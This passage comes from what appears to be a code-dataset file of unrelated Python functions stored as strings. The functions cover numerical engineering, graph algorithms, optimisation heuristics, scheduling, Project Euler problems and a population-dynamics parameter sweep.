(Est*bst*tst*(((bst/2)+(tsk/2)-zbar)**2)) # Using Parallel Axis Theorm\n NxEuler = ((math.pi**2)*EIbar)/(ribSpace**2*bsk) # Critical Load\n rsf = NxEuler/Nx\n return rsf - 1.1 # Using a target Reserve Factor of >=1.1", "def build_cumulative_downhill_matrix(self):\n\n import time\n from scipy import sparse as sparse\n\n\n walltime = time.clock()\n\n downHillaccuMat = self.downhillMat.copy() \n accuM = self.downhillMat.copy() # work matrix\n\n DX = np.ones(self.tri.npoints) # measure when all the info has been propagated out.\n previous_nonzero = 0\n it = 0\n\n while np.count_nonzero(DX) != previous_nonzero:\n accuM = accuM.dot(self.downhillMat)\n downHillaccuMat = downHillaccuMat + accuM \n previous_nonzero = np.count_nonzero(DX)\n\n DX = self.downhillMat.dot(DX) \n\n it += 1\n \n\n print \" - Dense downhill matrix storage time \", time.clock() - walltime\n print \" - Maximum path length \",it\n\n walltime = time.clock()\n\n\n # Turn this into a loop !\n\n A1 = self.downhillMat.tocsr()\n A2 = A1.dot(A1)\n A2a = A1 + A2\n A4 = A2.dot(A2)\n A4a = A2a + A2.dot(A2a)\n A8 = A4.dot(A4)\n A8a = A4a + A4.dot(A4a)\n A16 = A8.dot(A8)\n A16a = A8a + A8.dot(A8a)\n A32 = A16.dot(A16)\n A32a = A16a + A16.dot(A16a)\n A64 = A32.dot(A32)\n A64a = A32a + A32.dot(A32a)\n A128 = A64.dot(A64)\n A128a = A64a + A64.dot(A64a)\n\n print \"A32.nnz = \", A32.nnz\n print \"A64.nnz = \", A64.nnz\n print \"A128.nnz = \", A128.nnz\n\n\n print \" - Dense downhill matrix storage time v2\", time.clock() - walltime\n print \" - Maximum path length \", 128\n\n\n downHillaccuMat = downHillaccuMat + sparse.identity(self.tri.npoints, format='csr')\n\n downHillaccuMat2 = A128a + sparse.identity(self.tri.npoints, format='csr')\n\n\n return downHillaccuMat, downHillaccuMat2", "def compute_leaps_fast(start, end):\n return compute_leaps_fast_from_0(end)-compute_leaps_fast_from_0(start)", "def prjEuler():\r\n #Constants\r\n NUMSTRING = ( \"73167176531330624919225119674426574742355349194934\"\r\n \"96983520312774506326239578318016984801869478851843\"\r\n \"85861560789112949495459501737958331952853208805511\"\r\n \"12540698747158523863050715693290963295227443043557\"\r\n \"66896648950445244523161731856403098711121722383113\"\r\n \"62229893423380308135336276614282806444486645238749\"\r\n \"30358907296290491560440772390713810515859307960866\"\r\n \"70172427121883998797908792274921901699720888093776\"\r\n \"65727333001053367881220235421809751254540594752243\"\r\n \"52584907711670556013604839586446706324415722155397\"\r\n \"53697817977846174064955149290862569321978468622482\"\r\n \"83972241375657056057490261407972968652414535100474\"\r\n \"82166370484403199890008895243450658541227588666881\"\r\n \"16427171479924442928230863465674813919123162824586\"\r\n \"17866458359124566529476545682848912883142607690042\"\r\n \"24219022671055626321111109370544217506941658960408\"\r\n \"07198403850962455444362981230987879927244284909188\"\r\n \"84580156166097919133875499200524063689912560717606\"\r\n \"05886116467109405077541002256983155200055935729725\"\r\n \"71636269561882670428252483600823257530420752963450\" )\r\n \r\n #defined items\r\n greatest_prod = 1\r\n euler_queue = fiveQueue()\r\n \r\n #code\r\n for numIter in NUMSTRING:\r\n if( euler_queue.push( numIter ) ):\r\n temp_prod = euler_queue.product()\r\n if( temp_prod > greatest_prod ):\r\n greatest_prod = temp_prod\r\n \r\n print \"The greatest product is %d\" % greatest_prod\r\n return", "def schrage_nlogn(data):\n N = data.copy()\n for i in range(len(data)):\n N[i] = (N[i][0], N[i])\n heapq.heapify(N)\n \"\"\"\"\n mozna to zaltwic przy wczytaniu danych nie wplywa na zloznosc samego algorytmu\n \n N to tablica tablica krotek takich że (r , [r, p,q]), (r1, [r1 ,p1 , q1]) ........\n heapq sortuje po pierwszym elemncie dlatego tak\n \n G analogicznie z tym że sortowane jest malejaco po q więc G = [(q, [r, p ,q ]), (q1, [r1, p1, q1]) .......... ] \n \"\"\"\n G = []\n Pi = []\n t = N[0][0]\n start = timer()\n while len(G) != 0 or len(N) != 0:\n while len(N) != 0 and Schrage.save_min(N) <= t:\n e = heapq.heappop(N)\n heapq.heappush(G, (-e[1][2], e[1])) # O(log n)\n if len(G) != 0:\n e = heapq.heappop(G) # O(log n)\n Pi.append(e[1]) # O(1)\n t = t + e[1][1]\n else:\n t = N[0][0] # O(1)\n end = timer()\n executionTime = end - start\n return Pi, executionTime", "def Hashtables__Triplets():\n # URL: https://www.hackerrank.com/challenges/count-triplets-1/problem\n ## Passes all tests\n # O(n) ish.\n # dae9ccff5aea4a8ca6e087a7c16bd70d Notability notes\n from collections import defaultdict\n from dataclasses import dataclass\n\n @dataclass\n class I:\n idx: int\n cnt: int\n\n\n def countTriplets(arr, r):\n d = defaultdict(list)\n prev_count = defaultdict(int) #\n triple_count = 0\n for i, v in enumerate(arr):\n prev = v / r # (!) Integer division can be wrong. 17 // 3 -> 5. This builds incorrect previous (5, 17)\n prev_prev = (prev / r, prev)\n\n if prev_prev in d:\n # cnt = sum([i.cnt for i in d[prev_prev]]) # Counting the whole chain can be O(n) ish. Tests 6,11 fail.\n cnt = prev_count[(prev / r, prev, \"sum\")] # Optimization, keep rolling sum. -> O(1)\n triple_count += cnt\n if prev in d:\n prev_c = len(d[prev]) # O(1)\n d[(prev, v)].append(I(i, prev_c))\n prev_count[(prev, v, \"sum\")] += prev_c # Keep rolling su.\n d[v].append(i)\n\n return triple_count\n\n _, r = [int(i) for i in input().split()]\n arr = [float(i) for i in input().split()]\n print(countTriplets(arr, r))\n\n #### wip entries\n # T (Submission 6) -> (integer devision issue.\n # 100000 3\n # 1 17 80 68 5 5 58 17 38 81 26 44 38 6 12 ...\n # expr: 2325652489\n # Act : 667065187 << wrong, under count.\n # ac2 : 19107507001 << wrong, over count. (integer devision issue.\n # ac3: 2325652489", "def run(data, params):\n start_time = time.process_time()\n\n # 'n' is the number of candidates, also the number of ranks\n n = params['n']\n # 'N' is the total number of voters\n N = params['N']\n # 's0' is the optional ground truth full ranking of the candidates\n # (distribution is drawn off this full ranking)\n s0 = params['s0']\n\n # Order candidates by non-decreasing pair-wise contest wins \n # (ascending order with lexicographic tie-breaking)\n precedenceMatrix = utils.precedenceMatrix(data, n)\n\n # Credits to Sayan-Paul for starter code for merge sort\n # See: https://github.com/Sayan-Paul/Sort-Library-in-Python/blob/master/sortlib.py\n def mergesort(ar):\n if len(ar)<=1:\n return ar\n middle=len(ar)/2\n left =ar[:middle]\n right=ar[middle:]\n left=mergesort(left)\n right=mergesort(right)\n res=merge(left,right)\n return res\n\n def merge(left,right):\n res=[]\n while len(left)+len(right):\n if len(left)*len(right):\n if precedenceMatrix[left[0],right[0]]<=precedenceMatrix[right[0],left[0]]:\n res.append(left[0])\n left=left[1:]\n else:\n res.append(right[0])\n right=right[1:]\n elif len(left):\n res.append(left[0])\n left=left[1:]\n elif len(right):\n res.append(right[0])\n right=right[1:]\n return res\n\n candidates = [i for i in range(n)]\n sortedCandidates = mergesort(candidates)\n\n sigma = tuple(sortedCandidates)\n\n time_elapsed = (time.process_time() - start_time) * 1000\n\n return ALGORITHM_NAME, utils.generalizedKendallTauDistance(data, sigma, n, N, s0), time_elapsed, sigma", "def test_uneven_sw():\n B = 100\n t = 1\n H = 30\n E = 20000\n sections = ((2 * B, t, 0, E), (B, t, H - t, E))\n EI, top, bot = bm.EI(sections, E)\n assert 1.95 < abs(bot) / top < 1.96", "def bruteForceSearch(digraph, start, end, maxTotalDist, maxDistOutdoors):\n bFSResult = {}\n \n# Helper function to calculate Total Distance in a path\n def Dist(path):\n result = 0\n if path == None:\n return result\n if len(path) == 0:\n return result\n for i in range(len(path)-1):\n src = path[i]\n dest = path[i+1]\n for item in digraph.edges[src]:\n if item[0] == dest:\n result += item[1]\n return result \n \n # Helper function to calculate Total Outdoor Distance in a path\n def Out(path):\n result = 0\n if path == None:\n return result \n if len(path) == 0:\n return result\n for i in range(len(path)-1):\n src = path[i]\n dest = path[i+1]\n for item in digraph.edges[src]:\n if item[0] == dest:\n result += item[2]\n return result \n\n # Helper function using DFS method\n def bFS(graph, start, end, maxD, maxO, path = [], result = None):\n path = path + [start]\n if start == end:\n return path\n for node in graph.childrenOf(start):\n if node not in path: #avoid cycles\n if result == None:\n newPath = bFS(graph,node,end,maxD, maxO, path)\n if newPath!= None and Dist(newPath) <= maxD and Out(newPath) <= maxO: \n result = newPath\n distResult = Dist(result)\n if result != None and distResult not in bFSResult:\n bFSResult[distResult] = result\n if len(result) == 2 and result[-1] == end:\n break\n \n\n bFS(digraph, start, end, maxTotalDist, maxDistOutdoors)\n if len(bFSResult) == 0:\n raise ValueError\n else:\n return bFSResult[min(bFSResult)]", "def compute_audit(self):\r\n \r\n time = datetime.now()\r\n H0_dist = []\r\n Ha_dist = []\r\n\r\n for i in range(0, self.m):\r\n #print(\"CURRENT H0 dist: \", H0_dist)\r\n #try:\r\n H0_dist = self.next_round_dist(True, H0_dist, i)\r\n Ha_dist = self.next_round_dist(False, Ha_dist, i)\r\n '''\r\n except Exception as e:\r\n \r\n print(e)\r\n self.bad = H0_dist\r\n self.bad2 = Ha_dist\r\n return\r\n '''\r\n self.decide_k_min(H0_dist, Ha_dist, i)\r\n #print('ROUND INDEX: ',i,'kminschedl: ',self.k_min_sched[i])\r\n\r\n #self.truncate_dist(H0_dist, i)\r\n H0_dist = H0_dist[:self.k_min_sched[i]]\r\n #self.truncate_dist(Ha_dist, i)\r\n Ha_dist = Ha_dist[:self.k_min_sched[i]]\r\n \r\n #print(\"The outputs: k_mins, LR denominator, LR numerator, 1 / LR (or alpha').\")\r\n #print(self.k_min_sched, '\\n', self.pr_H0_sched, '\\n', self.pr_Ha_sched, '\\n', \r\n #self.risk_sched)\r\n #print(\"Output suppressed. Use instance variables k_min_sched, pr_H0_sched, pr_Ha_sched, risk_sched\")\r\n\r\n #print(\"Time elapsed:\", datetime.now() - time)\r", "def detectMiss(n, k):\n k -= 1\n nlog = math.ceil(math.log(n,2))\n nloglessone = nlog - 1\n lower_base = 2**nloglessone - 1\n lowerbaseBack = lower_base\n diff_list = [2**i for i in range(nloglessone-1, 0, -1)]\n diff_lit_back = diff_list[1:-1]\n if lower_base == k and 2**nlog -1 == n:\n return(k)\n matchres = False\n while(lower_base <= k and len(diff_list)>0 ):\n if lower_base == k:\n matchres = True\n break\n else:\n addVal = diff_list[0]\n lower_base += addVal\n diff_list.remove(addVal)\n if matchres:\n k -= 1\n if k%2==0:\n return(k)\n else:\n while(len(diff_lit_back)>0 and lowerbaseBack<k):\n newAddVal = diff_lit_back[0]\n lowerbaseBack = lowerbaseBack+newAddVal\n postitionIndx = lowerbaseBack + newAddVal\n if lowerbaseBack == k and postitionIndx <= n:\n return(k)\n elif lowerbaseBack == k and postitionIndx > n:\n return(k-1)\n else:\n pass\n diff_lit_back.remove(newAddVal)\n\n return(k)", "def _matrix_store_smooth_downhill(self):\n \n import time\n from scipy import sparse as sparse\n from scipy.sparse import linalg as linalgs \n \n\n t = time.clock()\n\n\n size = 0\n for nl in self.neighbour_array_lo_hi:\n size += 3 # len(nl)\n\n row_array = np.empty(size, dtype = int)\n col_array = np.empty(size, dtype = int)\n slope_array = np.zeros(size)\n local_slope_array = np.zeros(64)\n\n\n idx=0 \n for row in range(0, len(self.neighbour_array_lo_hi)): \n neighbours = self.neighbour_array_lo_hi[row] \n npoints = self.tri.points[neighbours]\n\n ## work out (downhill) gradient to (max of three) nearby neighbours\n \n\n for col, column in enumerate(neighbours[0:3]): \n \n delta_h = self.height[column] - self.height[row] \n\n\n if delta_h < 0.0:\n delta_s2 = (self.x[column] - self.x[row])**2 + (self.y[column] - self.y[row])**2\n local_slope_array[col] = ( delta_h**2 / delta_s2 )**5\n\n elif delta_h == 0.0 and self.bmask[row] == False:\n local_slope_array[col] = 1.0e-20\n\n else:\n local_slope_array[col] = 1.0e-20 \n \n # Normalise this so that it conserves mass (note - low points will have no contributions here !) \n \n norm = local_slope_array[0:len(neighbours)].sum()\n if norm != 0.0:\n norm = 1.0 / norm\n\n for col, column in enumerate(neighbours[0:3]): \n row_array[idx] = row\n col_array[idx] = column \n slope_array[idx] = local_slope_array[col] * norm\n\n idx += 1\n\n # We can re-pack this array into a sparse matrix for v. fast computation of downhill operator \n\n slopeCOO = sparse.coo_matrix( (slope_array, (row_array, col_array)) ).T\n slopeMat = slopeCOO.tocsr() \n \n print \"SlopeMat.shape \", slopeMat.shape, size\n\n # slopeNormVec = np.array(slopeMat.sum(axis=1)).T[0]\n # slopeNormVec[slopeNormVec != 0.0] = 1.0 / slopeNormVec[slopeNormVec != 0.0]\n # slopeNormMat = sparse.eye(self.tri.npoints)\n # slopeNormMat.setdiag(slopeNormVec)\n # slopeMat = slopeNormMat.dot(slopeMat)\n\n slopeMat.eliminate_zeros()\n self.smoothDownhillMat = slopeMat\n\n return", "def big_analysis(beta0s=[0.5, 0.8, 1.1, 1.4, 1.7], ks=range(6), betaps=[1.2, 1.5, 2, 3]):", "def hillclimber_algorithm(iterations, water_layout, max_houses, ts, neighbourhood=None, score = None, mode=None): \n \n ################################ start by creating a random neighbourhood ###################\n \n # standard neighbourhood distribution of the houses\n amount_sfh, amount_bungalow, amount_maison = max_houses*0.6, max_houses*0.25, max_houses*0.15\n\n if mode == \"greedy\":\n file_name = \"Hillclimber-greedy\"\n elif mode == \"bestrandom\":\n file_name = \"Hillclimber-bestrandom\"\n else:\n file_name = \"Hillclimber-random\"\n\n # create table\n table = []\n if neighbourhood == None:\n # create neighbourhood, place water and build houses, collect neighbourhood and score\n neighbourhood = []\n neighbourhood = waterbuilder(water_layout, neighbourhood)\n neighbourhood, score = housebuilder(max_houses, amount_maison, amount_bungalow, amount_sfh, neighbourhood)\n\n ################################ now iterate using the hill climber method ####################\n\n # for loop through iterations\n for i in range(iterations):\n\n # create a deepcopy of the current neighbourhood layout\n temp_neighbourhood = deepcopy(neighbourhood)\n\n # choose a random house\n random_house = rd.choice([h for h in temp_neighbourhood if h.name != \"WATER\"])\n temp_neighbourhood.remove(random_house)\n \n # get house type and id\n type_house = random_house.type\n ID = random_house.id\n\n # make house with same id and type\n house = House(type_house,str(ID))\n if location_checker(house, temp_neighbourhood) == False:\n while location_checker(house, temp_neighbourhood) == False:\n house = House(type_house, i)\n \n temp_neighbourhood.append(house)\n\n # calculate new shortest_distances\n temp_neighbourhood = distance_check(temp_neighbourhood)\n\n # now calculate the score of this new neighbourhood\n new_score = scorecalculator(temp_neighbourhood)\n\n # compare the score of the old neighbourhood to the new one, choose the best one\n if new_score > score:\n neighbourhood = deepcopy(temp_neighbourhood)\n score = new_score\n\n # save progress in table\n table.append([i, max_houses, score, new_score])\n\n # save results in dataframe\n df_hillclimber = pd.DataFrame(table, columns = [\"iteration\", \"max_houses\", \"old_score\", \"new_score\"])\n \n # make a visualisation of the best score and save it\n create_map(neighbourhood, score, file_name, ts, str(file_name+\"_map-\"+str(max_houses)))\n \n # create a plot of the progress\n performanceplot(file_name, iterations, max_houses, ts, df_hillclimber.iteration, df_hillclimber.old_score)\n\n return neighbourhood, score", "def _heuristic(a, b):\n return (b[0] - a[0]) ** 2 + (b[1] - a[1]) ** 2", "def algorithm(self):\n t = time.clock()\n self.calculateFirstPath()\n improve = True\n while improve and (self.allowedTime > (time.clock() - t)):\n improve = False\n\n for i in range(self.NB_OF_NODES):\n for j in range(self.NB_OF_NODES):\n if j in [(i - 1) % self.NB_OF_NODES, i, (i + 1) % self.NB_OF_NODES]:\n continue\n\n if self.getDistance(i, i + 1) + self.getDistance(j, j + 1) > self.getDistance(i, j) + self.getDistance(i + 1, j + 1):\n self.exchange(i, j)\n improve = True", "def FigA7(case):\n \n #set the parameter, arrays\n \n n_array=np.array([1,2,3])\n\n #set the result arrays\n if case==0:\n class_number=5\n elif case==1:\n class_number=6\n fate=np.zeros([class_number])#number of evolutionary fate\n fate_matrix=np.zeros([np.size(n_array),np.size(fate)])\n \n time=np.linspace(0,100000, 1000000)\n loop=10**6\n \"\"\"\n 0 Co and/or Ch cannot survive in mono-culture\n 1 Co cannot invade\n 2 Only equilibrium of exclusion is stable\n 3 Only equilibrium of coexistence is stable\n 4 Two equilibria are UNstable\n 5 two Equilibrium are stable (which may occur only when sCO vs rCh)\n \"\"\"\n for tri in range(np.size(n_array)):\n counter=0\n n=n_array[tri]\n print(str(\"Hill coefficient is %d\" %(n)))\n fate=np.zeros([class_number])#number of evolutionary fate should be reset\n if case==0 or case==1:\n fname=str('parameter-sweep-MC-n%d-case%d' %(n, case))\n else:\n print(\"Error in case\")\n return 1\n \n for i in range(loop):\n if(i+1)%10000==0:\n print(i+1)\n Ks,cd,T0, alpha,=np.random.uniform(0,1,4)\n Kr,cr=np.random.uniform([Ks,0],[1,1],2)#Kr>Ks and cr.cd\n #check whether r is positive or not\n if case==0:\n r1=rmax*(1-cr-cd)#rCO\n r2=rmax#sCH\n W0Co=r1-dmax*T0**n/(T0**n+Kr**n)-alpha#initial growth of Cooperator\n W0Ch=r2-dmax*T0**n/(T0**n+Ks**n)-alpha#initial growth of Cheater\n elif case==1:\n r1=rmax*(1-cd)#sCo\n r2=rmax*(1-cr)#rCh\n W0Co=r1-dmax*T0**n/(T0**n+Ks**n)-alpha\n W0Ch=r2-dmax*T0**n/(T0**n+Kr**n)-alpha\n stab_e=0#initialize the falgs of stability\n stab_c=0\n if W0Co<0 or W0Ch<0:\n fate[0]+=1\n res=0\n else:\n #succeed in mono-culture \n init=np.array([T0,10**(-6)])\n if case==0: \n solCo=odeint(DyCoop, init, time, args=(T0, r1, Kr, alpha, n))\n Ts=solCo[-1,0]\n #x1s=solCo[-1,1]\n solCh=odeint(DyCheat, init, time, args=(T0, r2, Ks, alpha, n))\n x2s=solCh[-1,1]\n else:\n solCo=odeint(DyCoop, init, time, args=(T0, r1, Ks, alpha, n))\n Ts=solCo[-1,0]\n #x1s=solCo[-1,1]\n solCh=odeint(DyCheat, init, time, args=(T0, r2, Kr, alpha, n))\n x2s=solCh[-1,1]\n \n #Evolutionary dynamics \n if case==0:\n K=Kr\n else:\n K=Ks\n if r1*(1-x2s)-dmax*T0**n/(T0**n+K**n)<alpha:\n #Co cannot invade\n fate[1]+=1\n res=1\n else:\n #Co can invade\n #calculate Tdagger Td and check whether coexist or exclude\n if case==0:\n #rCo vs sCh\n #in this case, at most one equilbrium is stable\n tau=Quad(case,alpha,cr+cd,0,Kr, Ks, n)\n Td=tau**(1/n)\n if Td<Ts:\n #Co exclude Ch\n fate[2]+=1\n res=2\n else:\n x1d=alpha*Kd*(T0-Td)/(fmax*Td-alpha*(T0-Td))\n x2d=1-x1d-(dmax*Td**n/(Td**n+K**n)+alpha)/r1\n #check the stability condition\n stab=Stab_cond(alpha, T0, Td,x1d,x2d, r1,r2,n, K)\n if stab==0:\n #stable coexistence\n fate[3]+=1\n res=3\n else:\n #unstable coexistence nor exclusion\n fate[4]+=1\n res=4\n print(Td, x1d, x2d)\n else:\n #sCo vs rCh\n # in this case two equilibria can be stable at the same time\n [tau_p,tau_m]=Quad(case,alpha,cd,cr,Ks, Kr, n)\n if tau_m>Ts**n or tau_p<Ts**n:\n # cexclusion is stable\n stab_e=1\n # stability in coexistence \n if tau_p<0:\n stab_c=0\n else:\n Td=tau_p**(1/n)\n x1d=alpha*Kd*(T0-Td)/(fmax*Td-alpha*(T0-Td))\n x2d=1-x1d-(dmax*Td**n/(Td**n+K**n)+alpha)/r1\n #check the stability condition\n stab=Stab_cond(alpha, T0, Td,x1d,x2d, r1,r2,n, K)\n if stab==0:\n #stable coexistence\n stab_c=1\n #classify\n if stab_e==1 and stab_c==1:\n # two stable equilbria\n fate[5]+=1\n res=5\n elif stab_e==1 and stab_c==0:\n #only stable cexclusion\n fate[2]+=1\n res=2\n elif stab_e==0 and stab_c==1:\n #stable coexistence\n fate[3]+=1\n res=3\n else:\n #both unstable\n fate[4]+=1\n res=4\n \n #save the results\n if counter==0:\n result=np.array([[Ks, Kr, cr, cd, alpha, T0,res]])\n #save the result with parameter values\n \n else:\n #add array of results\n R=np.array([[Ks, Kr, cr, cd, alpha, T0,res]])\n result=np.concatenate((result, R), axis=0)\n counter+=1\n \n #save csv file and graph\n np.savetxt(fname+'.csv',result, delimiter=',', header='Ks, Kr, cr, cd, alpha, T0, class', fmt='%.6f') \n print(fate)\n fate_matrix[tri,:]=fate \n if case==0: \n np.savetxt('parameter_sweep_MC_total_case0.csv',fate_matrix, delimiter=',', header='cl0,l1,cl2,cl3,cl4', fmt='%d')\n else:\n np.savetxt('parameter_sweep_MC_total_case1.csv',fate_matrix, delimiter=',', header='cl0,l1,cl2,cl3,cl4,cl5', fmt='%d')\n Plot(case)", "def q2(array):\n a = array[2]\n b = array[7]\n c = array[8]\n d = array[13]\n a1 = roll(a, 00) + roll(b, 00) + roll(b, 12) + roll(c, 12) + roll(d, 28) + roll(a, 28) + roll(b, 28)\n b1 = roll(b, 19) + roll(c, 19) + roll(d, 3) + roll(a, 3) + roll(b, 3) + roll(c, 7) + roll(d, 23) + roll(a,\n 23) + roll(\n b, 23) + roll(a, 15) + roll(b, 15) + roll(b, 27) + roll(c, 27) + roll(d, 11) + roll(a, 11) + roll(b, 11) + roll(\n d, 31) + roll(a, 31) + roll(b, 31)\n c1 = roll(c, 0) + roll(d, 16) + roll(a, 16) + roll(b, 16) + roll(a, 8) + roll(b, 8) + roll(b, 20) + roll(c,\n 20) + roll(\n d, 4) + roll(a, 4) + roll(b, 4) + roll(d, 24) + roll(a, 24) + roll(b, 24)\n d1 = roll(a, 8) + roll(b, 8) + roll(b, 20) + roll(c, 20) + roll(d, 4) + roll(a, 4) + roll(b, 4) + roll(d,\n 24) + roll(a,\n 24) + roll(\n b, 24)\n\n return array[0], array[1], a1, array[3], array[4], array[5], array[6], b1, c1, array[9], array[10], array[11], \\\n array[\n 12], d1, array[14], array[15]", "def SA(targetMDG):\n hill_climbers = []\n for i in range(NUM_Population):\n hill_climbers.append(SimulatedAnnealing(targetMDG))\n\n completed_climbers = []\n completed_max_climbers = []\n\n # k: int, number of neighbors to be considered\n k = 20\n i = 0\n not_increased = 0\n max_score = 0\n\n while True:\n for climber in hill_climbers[:]:\n result = climber.climb_with_annealing(k, i)\n if not result:\n completed_climbers.append(climber)\n hill_climbers.remove(climber)\n max_completed_climber = SimulatedAnnealing(targetMDG)\n max_completed_climber.result = climber.max_result\n max_completed_climber.update_score()\n completed_max_climbers.append(max_completed_climber)\n\n total_climbers = hill_climbers + completed_climbers + completed_max_climbers\n total_climbers.sort()\n print(\"Iteration \", i, \": \", total_climbers[-1].score)\n\n if total_climbers[-1].score - max_score != 0:\n not_increased = 0\n else:\n not_increased += 1\n\n if len(hill_climbers) == 0 or not_increased == 10:\n break\n i += 1\n max_score = total_climbers[-1].score\n\n total_climbers = hill_climbers + completed_climbers + completed_max_climbers\n total_climbers.sort()\n\n max_climber = total_climbers[-1]\n\n print(\"TurboMQ = \", max_climber.score)\n for c in max_climber.result: # print all clusters which are not singleton\n if 1 != len(c.get_nodes()):\n print(c.get_nodes())\n\n return max_climber.result", "def kosaraju(graph):\n\n def reverse_edges(graph):\n \"\"\"Reverse the edges of a graph in place.\n\n Args:\n graph (defaultdict(list)): An adjacency list representation\n of a directed graph\n Returns:\n None (graph is modified in-place)\n \"\"\"\n # Add None to the end of each list of edges to act as sentinel value\n for node in graph:\n graph[node].append(None)\n # Add each new edge after the None sentinel\n new_key_values = defaultdict(lambda: list([None]))\n for node, edge_heads in graph.items():\n for head in edge_heads:\n if head is None:\n break\n if head in graph:\n graph[head].append(node)\n else:\n # Don't add new keys to dict while iterating over it\n new_key_values[head].append(node)\n # Add any new key-values to original adjacency list\n graph.update(new_key_values)\n # Remove all edges before the None sentinel, as well as the sentinel\n for node, edge_heads in graph.items():\n graph[node] = edge_heads[edge_heads.index(None)+1:]\n\n def dfs_loop(graph, ordered_nodes):\n\n def dfs_inorder_iter(graph, start_node):\n \"\"\"Do iterative traversal of graph\n\n Important wrinkle: Calculates finishing times\n as though traversal by simple recursive DFS algorithm\n (child node visited before parent node)\n \"\"\"\n nonlocal t\n\n if visited[start_node]:\n return\n\n seen_once = {}\n nodes_seen = 0\n stack = [start_node]\n nodes_in_stack = set(stack)\n\n while stack:\n node = stack.pop()\n nodes_in_stack.remove(node)\n if not seen_once.get(node):\n # It's our first time visiting the node,\n # so put it back on the stack; we won't take\n # it off permanently until we're backtracking\n stack.append(node)\n nodes_in_stack.add(node)\n seen_once[node] = True\n for neighbor_node in graph[node]:\n if (not visited[neighbor_node]\n and not seen_once.get(neighbor_node)\n and neighbor_node not in nodes_in_stack):\n stack.append(neighbor_node)\n nodes_in_stack.add(neighbor_node)\n else:\n # We're backtracking\n visited[node] = True\n finishing_times[t] = node\n t += 1\n sccs[s] += 1\n\n n = len(graph)\n finishing_times = [None for _ in range(n)]\n visited = {node: False for node in graph}\n sccs = Counter()\n\n t = 0 # Finishing time\n s = None # Leader node\n for node in ordered_nodes:\n if not visited[node]:\n s = node\n dfs_inorder_iter(graph, node)\n return finishing_times, sccs\n\n reverse_edges(graph)\n finishing_times, disregard = dfs_loop(graph, list(graph))\n reverse_edges(graph)\n disregard, sccs = dfs_loop(graph, reversed(finishing_times))\n return [count for leader, count in sccs.most_common(5)]", "def solve(n, x, blows):\n # max_dh = max(d - h for d, h in blows)\n\n r = float('inf')\n dh = []\n maxd = max(blows)[0]\n for d, h in blows:\n if d >= x:\n return 1\n elif d <= h:\n continue\n dh.append((d - h, d, h))\n v = int(math.ceil((x - maxd) / (d - h))) + 1\n r = min(r, v)\n if not dh:\n return -1\n return r", "def _build_cumulative_downhill_matrices(self):\n\n import time\n from scipy import sparse as sparse\n\n downSweepMat = self.accumulatorMat.copy() \n downHillaccuMat = self.downhillMat.copy() \n accuM = self.downhillMat.copy() # work matrix\n\n DX = np.ones(self.tri.npoints) # measure when all the info has been propagated out.\n\n walltime = time.clock()\n\n while np.any(DX):\n downSweepMat = downSweepMat.dot(self.accumulatorMat) # N applications of the accumulator\n accuM = accuM.dot(self.downhillMat)\n downHillaccuMat = downHillaccuMat + accuM \n \n DX = self.downhillMat.dot(DX) \n \n \n print \" - Dense downhill matrix storage time \", time.clock() - walltime\n\n downHillaccuMat = downHillaccuMat + sparse.identity(self.tri.npoints, format='csr')\n\n self.downhillCumulativeMat = downHillaccuMat\n self.sweepDownToOutflowMat = downSweepMat\n\n # print \"Terminated in \",it,\" iterations\"\n\n return", "def hr_game(t0, tf, n, A, B, R, x0):\n # t0 - Initial time\n # tf - Final time\n # n - Number of steps\n # A - Adjacency matrix, np.ndarray (N,N)\n # B - A 2D or 3D matrix with all payoff matrices, np.ndarray (S,S,N)\n # R - Relationship or preference matrix, np.ndarray (N,N)\n # x0 - Initial state of our system, np.ndarray (N,S), must be double\n\n # Number of players\n N = A[:, 0].size\n # Number of strategies\n S = x0[0, :].size\n # Step in each iteration\n h = (tf - t0) / n\n # Result of each step, np.ndarray (N, S, n+1)\n y = np.zeros([N, S, n+1], dtype='double')\n y[:, :, 0] = x0\n k = np.zeros([N, S])\n # I still don't know why, but theres a problem with negative payoffs\n B = matrixTranslate(B)\n\n # Fourth order Runge-Kutta\n for t in range(n):\n k1 = np.multiply(h, hr_egn(A, B, R, y[:, :, t]))\n k2 = np.multiply(h, hr_egn(A, B, R, np.add(y[:, :, t], np.divide(k1, 2))))\n k3 = np.multiply(h, hr_egn(A, B, R, np.add(y[:, :, t], np.divide(k2, 2))))\n k4 = np.multiply(h, hr_egn(A, B, R, np.add(y[:, :, t], k3)))\n # k = (k1 + 2*k2 + 2*k3 + k4)/6\n k = np.divide(np.add(np.add(k1, np.multiply(2, k2)), np.add(np.multiply(2, k3), k4)), 6)\n\n y[:, :, t+1] = np.add(y[:, :, t], k)\n\n # Filter results with machine epsilon\n for v in range(N):\n for s in range(S):\n if y[v, s, t+1] < np.sqrt(np.finfo('double').eps):\n y[v, s, t+1] = 0\n elif y[v, s, t+1] > np.subtract(1, np.sqrt(np.finfo('double').eps)):\n y[v, s, t + 1] = 1\n\n return y", "def answer():\n for k in range(2,3000):\n for j in range(k-1,0,-1):\n pj, pk = P(j), P(k)\n #print( j, k, pj, pk )\n if isPent(pk-pj):\n #print( j, k, pj, pk, pk+pj, isPent(pk+pj), pk-pj )\n if isPent(pk+pj) and isPent(pk-pj):\n return pk-pj", "def q8(array):\n a = array[0]\n b = array[4]\n c = array[8]\n d = array[12]\n a1 = roll(a, 00) + roll(b, 00) + roll(b, 12) + roll(c, 12) + roll(d, 28) + roll(a, 28) + roll(b, 28)\n b1 = roll(b, 19) + roll(c, 19) + roll(d, 3) + roll(a, 3) + roll(b, 3) + roll(c, 7) + roll(d, 23) + roll(a,\n 23) + roll(\n b, 23) + roll(a, 15) + roll(b, 15) + roll(b, 27) + roll(c, 27) + roll(d, 11) + roll(a, 11) + roll(b, 11) + roll(\n d, 31) + roll(a, 31) + roll(b, 31)\n c1 = roll(c, 0) + roll(d, 16) + roll(a, 16) + roll(b, 16) + roll(a, 8) + roll(b, 8) + roll(b, 20) + roll(c,\n 20) + roll(\n d, 4) + roll(a, 4) + roll(b, 4) + roll(d, 24) + roll(a, 24) + roll(b, 24)\n d1 = roll(a, 8) + roll(b, 8) + roll(b, 20) + roll(c, 20) + roll(d, 4) + roll(a, 4) + roll(b, 4) + roll(d,\n 24) + roll(a,\n 24) + roll(\n b, 24)\n\n return a1, array[1], array[2], array[3], b1, array[5], array[6], array[7], c1, array[9], array[\n 10], array[11], d1, array[13], array[14], array[15]", "def find_harshad(d):\n if d == 1:\n return list(range(1, 10))\n acc = []\n for x in find_harshad(d - 1):\n for a in range(10):\n n = x * 10 + a\n if is_harshad(n):\n acc.append(n)\n return acc", "def q6(array):\n 